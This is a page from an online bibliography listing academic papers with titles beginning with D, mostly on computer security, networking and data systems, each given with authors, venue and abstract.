Visible to the public Biblio

Found 722 results

Filters: First Letter Of Title is D  [Clear All Filters]
A B C [D] E F G H I J K L M N O P Q R S T U V W X Y Z   [Show ALL]
D
Salman, A., Elhajj, I.H., Chehab, A., Kayssi, A..  2014.  DAIDS: An Architecture for Modular Mobile IDS. Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on. :328-333.

The popularity of mobile devices and the enormous number of third party mobile applications in the market have naturally lead to several vulnerabilities being identified and abused. This is coupled with the immaturity of intrusion detection system (IDS) technology targeting mobile devices. In this paper we propose a modular host-based IDS framework for mobile devices that uses behavior analysis to profile applications on the Android platform. Anomaly detection can then be used to categorize malicious behavior and alert users. The proposed system accommodates different detection algorithms, and is being tested at a major telecom operator in North America. This paper highlights the architecture, findings, and lessons learned.

Mallik, Nilanjan, Wali, A. S., Kuri, Narendra.  2016.  Damage Location Identification Through Neural Network Learning from Optical Fiber Signal for Structural Health Monitoring. Proceedings of the 5th International Conference on Mechatronics and Control Engineering. :157–161.

Present work deals with prediction of damage location in a composite cantilever beam using signal from optical fiber sensor coupled with a neural network with back propagation based learning mechanism. The experimental study uses glass/epoxy composite cantilever beam. Notch perpendicular to the axis of the beam and spanning throughout the width of the beam is introduced at three different locations viz. at the middle of the span, towards the free end of the beam and towards the fixed end of the beam. A plastic optical fiber of 6 cm gage length is mounted on the top surface of the beam along the axis of the beam exactly at the mid span. He-Ne laser is used as light source for the optical fiber and light emitting from other end of the fiber is converted to electrical signal through a converter. A three layer feed forward neural network architecture is adopted having one each input layer, hidden layer and output layer. Three features are extracted from the signal viz. resonance frequency, normalized amplitude and normalized area under resonance frequency. These three features act as inputs to the neural network input layer. The outputs qualitatively identify the location of the notch.

Redmiles, Elissa M., Mazurek, Michelle L., Dickerson, John P..  2018.  Dancing Pigs or Externalities?: Measuring the Rationality of Security Decisions Proceedings of the 2018 ACM Conference on Economics and Computation. :215-232.

Accurately modeling human decision-making in security is critical to thinking about when, why, and how to recommend that users adopt certain secure behaviors. In this work, we conduct behavioral economics experiments to model the rationality of end-user security decision-making in a realistic online experimental system simulating a bank account. We ask participants to make a financially impactful security choice, in the face of transparent risks of account compromise and benefits offered by an optional security behavior (two-factor authentication). We measure the cost and utility of adopting the security behavior via measurements of time spent executing the behavior and estimates of the participant's wage. We find that more than 50% of our participants made rational (e.g., utility optimal) decisions, and we find that participants are more likely to behave rationally in the face of higher risk. Additionally, we find that users' decisions can be modeled well as a function of past behavior (anchoring effects), knowledge of costs, and to a lesser extent, users' awareness of risks and context (R2=0.61). We also find evidence of endowment effects, as seen in other areas of economic and psychological decision-science literature, in our digital-security setting. Finally, using our data, we show theoretically that a "one-size-fits-all" emphasis on security can lead to market losses, but that adoption by a subset of users with higher risks or lower costs can lead to market gains.

Mueller, Tobias, Klotzsche, Daniel, Herrmann, Dominik, Federrath, Hannes.  2019.  Dangers and Prevalence of Unprotected Web Fonts. 2019 International Conference on Software, Telecommunications and Computer Networks (SoftCOM). :1—5.
Most Web sites rely on resources hosted by third parties such as CDNs. Third parties may be compromised or coerced into misbehaving, e.g. delivering a malicious script or stylesheet. Unexpected changes to resources hosted by third parties can be detected with the Subresource Integrity (SRI) mechanism. The focus of SRI is on scripts and stylesheets. Web fonts cannot be secured with that mechanism under all circumstances. The first contribution of this paper is to evaluates the potential for attacks using malicious fonts. With an instrumented browser we find that (1) more than 95% of the top 50,000 Web sites of the Tranco top list rely on resources hosted by third parties and that (2) only a small fraction employs SRI. Moreover, we find that more than 60% of the sites in our sample use fonts hosted by third parties, most of which are being served by Google. The second contribution of the paper is a proof of concept of a malicious font as well as a tool for automatically generating such a font, which targets security-conscious users who are used to verifying cryptographic fingerprints. Software vendors publish such fingerprints along with their software packages to allow users to verify their integrity. Due to incomplete SRI support for Web fonts, a third party could force a browser to load our malicious font. The font targets a particular cryptographic fingerprint and renders it as a desired different fingerprint. This allows attackers to fool users into believing that they download a genuine software package although they are actually downloading a maliciously modified version. Finally, we propose countermeasures that could be deployed to protect the integrity of Web fonts.
Rafiuddin, M. F. B., Minhas, H., Dhubb, P. S..  2017.  A dark web story in-depth research and study conducted on the dark web based on forensic computing and security in Malaysia. 2017 IEEE International Conference on Power, Control, Signals and Instrumentation Engineering (ICPCSI). :3049–3055.
The following is a research conducted on the Dark Web to study and identify the ins and outs of the dark web, what the dark web is all about, the various methods available to access the dark web and many others. The researchers have also included the steps and precautions taken before the dark web was opened. Apart from that, the findings and the website links / URL are also included along with a description of the sites. The primary usage of the dark web and some of the researcher's experience has been further documented in this research paper.
Tian, Zhao, Wright, Kevin, Zhou, Xia.  2016.  The darkLight Rises: Visible Light Communication in the Dark. Proceedings of the 22Nd Annual International Conference on Mobile Computing and Networking. :2–15.

Visible Light Communication (VLC) emerges as a new wireless communication technology with appealing benefits not present in radio communication. However, current VLC designs commonly require LED lights to emit shining light beams, which greatly limits the applicable scenarios of VLC (e.g., in a sunny day when indoor lighting is not needed). It also entails high energy overhead and unpleasant visual experiences for mobile devices to transmit data using VLC. We design and develop DarkLight, a new VLC primitive that allows light-based communication to be sustained even when LEDs emit extremely-low luminance. The key idea is to encode data into ultra-short, imperceptible light pulses. We tackle challenges in circuit designs, data encoding/decoding schemes, and DarkLight networking, to efficiently generate and reliably detect ultra-short light pulses using off-the-shelf, low-cost LEDs and photodiodes. Our DarkLight prototype supports 1.3-m distance with 1.6-Kbps data rate. By loosening up VLC's reliance on visible light beams, DarkLight presents an unconventional direction of VLC design and fundamentally broadens VLC's application scenarios.

Ibrahim, Ahmad, Sadeghi, Ahmad-Reza, Tsudik, Gene, Zeitouni, Shaza.  2016.  DARPA: Device Attestation Resilient to Physical Attacks. Proceedings of the 9th ACM Conference on Security & Privacy in Wireless and Mobile Networks. :171–182.

As embedded devices (under the guise of "smart-whatever") rapidly proliferate into many domains, they become attractive targets for malware. Protecting them from software and physical attacks becomes both important and challenging. Remote attestation is a basic tool for mitigating such attacks. It allows a trusted party (verifier) to remotely assess software integrity of a remote, untrusted, and possibly compromised, embedded device (prover). Prior remote attestation methods focus on software (malware) attacks in a one-verifier/one-prover setting. Physical attacks on provers are generally ruled out as being either unrealistic or impossible to mitigate. In this paper, we argue that physical attacks must be considered, particularly, in the context of many provers, e.g., a network, of devices. As- suming that physical attacks require capture and subsequent temporary disablement of the victim device(s), we propose DARPA, a light-weight protocol that takes advantage of absence detection to identify suspected devices. DARPA is resilient against a very strong adversary and imposes minimal additional hardware requirements. We justify and identify DARPA's design goals and evaluate its security and costs.

Dridi, M., Rubini, S., Lallali, M., Florez, M. J. S., Singhoff, F., Diguet, J. P..  2017.  DAS: An Efficient NoC Router for Mixed-Criticality Real-Time Systems. 2017 IEEE International Conference on Computer Design (ICCD). :229–232.

Mixed-Criticality Systems (MCS) are real-time systems characterized by two or more distinct levels of criticality. In MCS, it is imperative that high-critical flows meet their deadlines while low critical flows can tolerate some delays. Sharing resources between flows in Network-On-Chip (NoC) can lead to different unpredictable latencies and subsequently complicate the implementation of MCS in many-core architectures. This paper proposes a new virtual channel router designed for MCS deployed over NoCs. The first objective of this router is to reduce the worst-case communication latency of high-critical flows. The second aim is to improve the network use rate and reduce the communication latency for low-critical flows. The proposed router, called DAS (Double Arbiter and Switching router), jointly uses Wormhole and Store And Forward techniques for low and high-critical flows respectively. Simulations with a cycle-accurate SystemC NoC simulator show that, with a 15% network use rate, the communication delay of high-critical flows is reduced by 80% while communication delay of low-critical flow is increased by 18% compared to usual solutions based on routers with multiple virtual channels.

Guanyu, Chen, Yunjie, Han, Chang, Li, Changrui, Lin, Degui, Fang, Xiaohui, Rong.  2019.  Data Acquisition Network and Application System Based on 6LoWPAN and IPv6 Transition Technology. 2019 IEEE 2nd International Conference on Electronics Technology (ICET). :78–83.
In recent years, IPv6 will gradually replace IPv4 with IPv4 address exhaustion and the rapid development of the Low-Power Wide-Area network (LPWAN) wireless communication technology. This paper proposes a data acquisition and application system based on 6LoWPAN and IPv6 transition technology. The system uses 6LoWPAN and 6to4 tunnel to realize integration of the internal sensor network and Internet to improve the adaptability of the gateway and reduce the average forwarding delay and packet loss rate of small data packet. Moreover, we design and implement the functions of device access management, multiservice data storage and affair data service by combining the C/S architecture with the actual uploaded river quality data. The system has the advantages of flexible networking, low power consumption, rich IPv6 address, high communication security, and strong reusability.
Wen, M., Zhang, X., Li, H., Li, J..  2017.  A Data Aggregation Scheme with Fine-Grained Access Control for the Smart Grid. 2017 IEEE 86th Vehicular Technology Conference (VTC-Fall). :1–5.

With the rapid development of smart grid, smart meters are deployed at energy consumers' premises to collect real-time usage data. Although such a communication model can help the control center of the energy producer to improve the efficiency and reliability of electricity delivery, it also leads to some security issues. For example, this real-time data involves the customers' privacy. Attackers may violate the privacy for house breaking, or they may tamper with the transmitted data for their own benefits. For this purpose, many data aggregation schemes are proposed for privacy preservation. However, rare of them cares about both the data aggregation and fine-grained access control to improve the data utility. In this paper, we proposes a data aggregation scheme based on attribute decision tree. Security analysis illustrates that our scheme can achieve the data integrity, data privacy preservation and fine- grained data access control. Experiment results show that our scheme are more efficient than existing schemes.

Sen, Amartya, Madria, Sanjay.  2018.  Data Analysis of Cloud Security Alliance's Security, Trust & Assurance Registry. Proceedings of the 19th International Conference on Distributed Computing and Networking. :42:1–42:10.
The security of clients' applications on the cloud platforms has been of great interest. Security concerns associated with cloud computing are improving in both the domains; security issues faced by cloud providers and security issues faced by clients. However, security concerns still remain in domains like cloud auditing and migrating application components to cloud to make the process more secure and cost-efficient. To an extent, this can be attributed to a lack of detailed information being publicly present about the cloud platforms and their security policies. A resolution in this regard can be found in Cloud Security Alliance's Security, Trust, and Assurance Registry (STAR) which documents the security controls provided by popular cloud computing offerings. In this paper, we perform some descriptive analysis on STAR data in an attempt to comprehend the information publicly presented by different cloud providers. It is to help clients in more effectively searching and analyzing the required security information they need for the decision making process for hosting their applications on cloud. Based on the analysis, we outline some augmentations that can be made to STAR as well as certain specific design improvements for a cloud migration risk assessment framework.
Khan, Iqra, Durad, Hanif, Alam, Masoom.  2019.  Data Analytics Layer For high-interaction Honeypots. 2019 16th International Bhurban Conference on Applied Sciences and Technology (IBCAST). :681–686.

Security of VMs is now becoming a hot topic due to their outsourcing in cloud computing paradigm. All VMs present on the network are connected to each other, making exploited VMs danger to other VMs. and threats to organization. Rejuvenation of virtualization brought the emergence of hyper-visor based security services like VMI (Virtual machine introspection). As there is a greater chance for any intrusion detection system running on the same system, of being dis-abled by the malware or attacker. Monitoring of VMs using VMI, is one of the most researched and accepted technique, that is used to ensure computer systems security mostly in the paradigm of cloud computing. This thesis presents a work that is to integrate LibVMI with Volatility on a KVM, a Linux based hypervisor, to introspect memory of VMs. Both of these tools are used to monitor the state of live VMs. VMI capability of monitoring VMs is combined with the malware analysis and virtual honeypots to achieve the objective of this project. A testing environment is deployed, where a network of VMs is used to be introspected using Volatility plug-ins. Time execution of each plug-in executed on live VMs is calculated to observe the performance of Volatility plug-ins. All these VMs are deployed as Virtual Honeypots having honey-pots configured on them, which is used as a detection mechanism to trigger alerts when some malware attack the VMs. Using STIX (Structure Threat Information Expression), extracted IOCs are converted into the understandable, flexible, structured and shareable format.

Yao, Danfeng(Daphne).  2018.  Data Breach and Multiple Points to Stop It. Proceedings of the 23Nd ACM on Symposium on Access Control Models and Technologies. :1–1.
Preventing unauthorized access to sensitive data is an exceedingly complex access control problem. In this keynote, I will break down the data breach problem and give insights into how organizations could and should do to reduce their risks. The talk will start with discussing the technical reasons behind some of the recent high-profile data breach incidents (e.g., in Equifax, Target), as well as pointing out the threats of inadvertent or accidental data leaks. Then, I will show that there are usually multiple points to stop data breach and give an overview of the relevant state-of-the-art solutions. I will focus on some of the recent algorithmic advances in preventing inadvertent data loss, including set-based and alignment-based screening techniques, outsourced screening, and GPU-based performance acceleration. I will also briefly discuss the role of non-technical factors (e.g., organizational culture on security) in data protection. Because of the cat-and-mouse-game nature of cybersecurity, achieving absolute data security is impossible. However, proactively securing critical data paths through strategic planning and placement of security tools will help reduce the risks. I will also point out a few exciting future research directions, e.g., on data leak detection as a cloud security service and deep learning for reducing false alarms in continuous authentication and the prickly insider-threat detection.
Liu, Ying, He, Qiang, Zheng, Dequan, Zhang, Mingwei, Chen, Feifei, Zhang, Bin.  2019.  Data Caching Optimization in the Edge Computing Environment. 2019 IEEE International Conference on Web Services (ICWS). :99–106.

With the rapid increase in the use of mobile devices in people's daily lives, mobile data traffic is exploding in recent years. In the edge computing environment where edge servers are deployed around mobile users, caching popular data on edge servers can ensure mobile users' fast access to those data and reduce the data traffic between mobile users and the centralized cloud. Existing studies consider the data cache problem with a focus on the reduction of network delay and the improvement of mobile devices' energy efficiency. In this paper, we attack the data caching problem in the edge computing environment from the service providers' perspective, who would like to maximize their venues of caching their data. This problem is complicated because data caching produces benefits at a cost and there usually is a trade-off in-between. In this paper, we formulate the data caching problem as an integer programming problem, and maximizes the revenue of the service provider while satisfying a constraint for data access latency. Extensive experiments are conducted on a real-world dataset that contains the locations of edge servers and mobile users, and the results reveal that our approach significantly outperform the baseline approaches.

Jayasinghe, U., Otebolaku, A., Um, T. W., Lee, G. M..  2017.  Data centric trust evaluation and prediction framework for IOT. 2017 ITU Kaleidoscope: Challenges for a Data-Driven Society (ITU K). :1–7.

Application of trust principals in internet of things (IoT) has allowed to provide more trustworthy services among the corresponding stakeholders. The most common method of assessing trust in IoT applications is to estimate trust level of the end entities (entity-centric) relative to the trustor. In these systems, trust level of the data is assumed to be the same as the trust level of the data source. However, most of the IoT based systems are data centric and operate in dynamic environments, which need immediate actions without waiting for a trust report from end entities. We address this challenge by extending our previous proposals on trust establishment for entities based on their reputation, experience and knowledge, to trust estimation of data items [1-3]. First, we present a hybrid trust framework for evaluating both data trust and entity trust, which will be enhanced as a standardization for future data driven society. The modules including data trust metric extraction, data trust aggregation, evaluation and prediction are elaborated inside the proposed framework. Finally, a possible design model is described to implement the proposed ideas.

Chu, Xu, Ilyas, Ihab F., Krishnan, Sanjay, Wang, Jiannan.  2016.  Data Cleaning: Overview and Emerging Challenges. Proceedings of the 2016 International Conference on Management of Data. :2201–2206.

Detecting and repairing dirty data is one of the perennial challenges in data analytics, and failure to do so can result in inaccurate analytics and unreliable decisions. Over the past few years, there has been a surge of interest from both industry and academia on data cleaning problems including new abstractions, interfaces, approaches for scalability, and statistical techniques. To better understand the new advances in the field, we will first present a taxonomy of the data cleaning literature in which we highlight the recent interest in techniques that use constraints, rules, or patterns to detect errors, which we call qualitative data cleaning. We will describe the state-of-the-art techniques and also highlight their limitations with a series of illustrative examples. While traditionally such approaches are distinct from quantitative approaches such as outlier detection, we also discuss recent work that casts such approaches into a statistical estimation framework including: using Machine Learning to improve the efficiency and accuracy of data cleaning and considering the effects of data cleaning on statistical analysis.

Feng, Chenwei, Wang, Xianling, Zhang, Zewang.  2018.  Data Compression Scheme Based on Discrete Sine Transform and Lloyd-Max Quantization. Proceedings of the 3rd International Conference on Intelligent Information Processing. :46-51.

With the increase of mobile equipment and transmission data, Common Public Radio Interface (CPRI) between Building Base band Unit (BBU) and Remote Radio Unit (RRU) suffers amounts of increasing transmission data. It is essential to compress the data in CPRI if more data should be transferred without congestion under the premise of restriction of fiber consumption. A data compression scheme based on Discrete Sine Transform (DST) and Lloyd-Max quantization is proposed in distributed Base Station (BS) architecture. The time-domain samples are transformed by DST according to the characteristics of Orthogonal Frequency Division Multiplexing (OFDM) baseband signals, and then the coefficients after transformation are quantified by the Lloyd-Max quantizer. The simulation results show that the proposed scheme can work at various Compression Ratios (CRs) while the values of Error Vector Magnitude (EVM) are better than the limits in 3GPP.

Thuraisingham, B., Kantarcioglu, M., Hamlen, K., Khan, L., Finin, T., Joshi, A., Oates, T., Bertino, E..  2016.  A Data Driven Approach for the Science of Cyber Security: Challenges and Directions. 2016 IEEE 17th International Conference on Information Reuse and Integration (IRI). :1–10.

This paper describes a data driven approach to studying the science of cyber security (SoS). It argues that science is driven by data. It then describes issues and approaches towards the following three aspects: (i) Data Driven Science for Attack Detection and Mitigation, (ii) Foundations for Data Trustworthiness and Policy-based Sharing, and (iii) A Risk-based Approach to Security Metrics. We believe that the three aspects addressed in this paper will form the basis for studying the Science of Cyber Security.

Jeyakumar, Vimalkumar, Madani, Omid, ParandehGheibi, Ali, Yadav, Navindra.  2016.  Data Driven Data Center Network Security. Proceedings of the 2016 ACM on International Workshop on Security And Privacy Analytics. :48–48.

Large scale datacenters are becoming the compute and data platform of large enterprises, but their scale makes them difficult to secure applications running within. We motivate this setting using a real world complex scenario, and propose a data-driven approach to taming this complexity. We discuss several machine learning problems that arise, in particular focusing on inducing so-called whitelist communication policies, from observing masses of communications among networked computing nodes. Briefly, a whitelist policy specifies which machine, or groups of machines, can talk to which. We present some of the challenges and opportunities, such as noisy and incomplete data, non-stationarity, lack of supervision, challenges of evaluation, and describe some of the approaches we have found promising.

Oertel, Catharine, Gustafson, Joakim, Black, Alan W..  2016.  On Data Driven Parametric Backchannel Synthesis for Expressing Attentiveness in Conversational Agents. Proceedings of the Workshop on Multimodal Analyses Enabling Artificial Agents in Human-Machine Interaction. :43–47.

In this study, we are using a multi-party recording as a template for building a parametric speech synthesiser which is able to express different levels of attentiveness in backchannel tokens. This allowed us to investigate i) whether it is possible to express the same perceived level of attentiveness in synthesised than in natural backchannels; ii) whether it is possible to increase and decrease the perceived level of attentiveness of backchannels beyond the range observed in the original corpus.

Bessa, Ricardo J., Rua, David, Abreu, Cláudia, Machado, Paulo, Andrade, José R., Pinto, Rui, Gonçalves, Carla, Reis, Marisa.  2018.  Data Economy for Prosumers in a Smart Grid Ecosystem. Proceedings of the Ninth International Conference on Future Energy Systems. :622–630.

Smart grids technologies are enablers of new business models for domestic consumers with local flexibility (generation, loads, storage) and where access to data is a key requirement in the value stream. However, legislation on personal data privacy and protection imposes the need to develop local models for flexibility modeling and forecasting and exchange models instead of personal data. This paper describes the functional architecture of an home energy management system (HEMS) and its optimization functions. A set of data-driven models, embedded in the HEMS, are discussed for improving renewable energy forecasting skill and modeling multi-period flexibility of distributed energy resources.

Van Acker, Steven, Hausknecht, Daniel, Sabelfeld, Andrei.  2016.  Data Exfiltration in the Face of CSP. Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. :853–864.

Cross-site scripting (XSS) attacks keep plaguing the Web. Supported by most modern browsers, Content Security Policy (CSP) prescribes the browser to restrict the features and communication capabilities of code on a web page, mitigating the effects of XSS.

This paper puts a spotlight on the problem of data exfiltration in the face of CSP. We bring attention to the unsettling discord in the security community about the very goals of CSP when it comes to preventing data leaks.

As consequences of this discord, we report on insecurities in the known protection mechanisms that are based on assumptions about CSP that turn out not to hold in practice.

To illustrate the practical impact of the discord, we perform a systematic case study of data exfiltration via DNS prefetching and resource prefetching in the face of CSP.

Our study of the popular browsers demonstrates that it is often possible to exfiltrate data by both resource prefetching and DNS prefetching in the face of CSP. Further, we perform a crawl of the top 10,000 Alexa domains to report on the cohabitance of CSP and prefetching in practice. Finally, we discuss directions to control data exfiltration and, for the case study, propose measures ranging from immediate fixes for the clients to prefetching-aware extensions of CSP.

Chatterjee, Tanusree, Ruj, Sushmita, DasBit, Sipra.  2018.  Data forwarding and update propagation in grid network for NDN: A low-overhead approach. 2018 IEEE International Conference on Advanced Networks and Telecommunications Systems (ANTS). :1–6.
Now-a-days Internet has become mostly content centric. Named Data Network (NDN) has emerged as a promising candidate to cope with the use of today's Internet. Several NDN features such as in-network caching, easier data forwarding, etc. in the routing method bring potential advantages over conventional networks. Despite the advantages, there are many challenges in NDN which are yet to be addressed. In this paper, we address two of such challenges in NDN routing: (1) Huge storage overhead in NDN router (2) High communication over-heads in the network during propagation of routing information updates. We propose changes in existing NDN routing with the aim to provide a low-overhead solution to these problems. Here instead of storing the Link State Data Base (LSDB) in all the routers, it is kept in selected special nodes only. The use of special nodes lowers down the overall storage and update overheads. We also provide supporting algorithms for data forwarding and update for grid network. The performance of the proposed method is evaluated in terms of storage and communication overheads. The results show the overheads are reduced by almost one third as compared to the existing routing method in NDN.
Khobragade, P.K., Malik, L.G..  2014.  Data Generation and Analysis for Digital Forensic Application Using Data Mining. Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on. :458-462.

In the cyber crime huge log data, transactional data occurs which tends to plenty of data for storage and analyze them. It is difficult for forensic investigators to play plenty of time to find out clue and analyze those data. In network forensic analysis involves network traces and detection of attacks. The trace involves an Intrusion Detection System and firewall logs, logs generated by network services and applications, packet captures by sniffers. In network lots of data is generated in every event of action, so it is difficult for forensic investigators to find out clue and analyzing those data. In network forensics is deals with analysis, monitoring, capturing, recording, and analysis of network traffic for detecting intrusions and investigating them. This paper focuses on data collection from the cyber system and web browser. The FTK 4.0 is discussing for memory forensic analysis and remote system forensic which is to be used as evidence for aiding investigation.
 

Luo, Chu, Fylakis, Angelos, Partala, Juha, Klakegg, Simon, Goncalves, Jorge, Liang, Kaitai, Seppänen, Tapio, Kostakos, Vassilis.  2016.  A Data Hiding Approach for Sensitive Smartphone Data. Proceedings of the 2016 ACM International Joint Conference on Pervasive and Ubiquitous Computing. :557–568.

We develop and evaluate a data hiding method that enables smartphones to encrypt and embed sensitive information into carrier streams of sensor data. Our evaluation considers multiple handsets and a variety of data types, and we demonstrate that our method has a computational cost that allows real-time data hiding on smartphones with negligible distortion of the carrier stream. These characteristics make it suitable for smartphone applications involving privacy-sensitive data such as medical monitoring systems and digital forensics tools.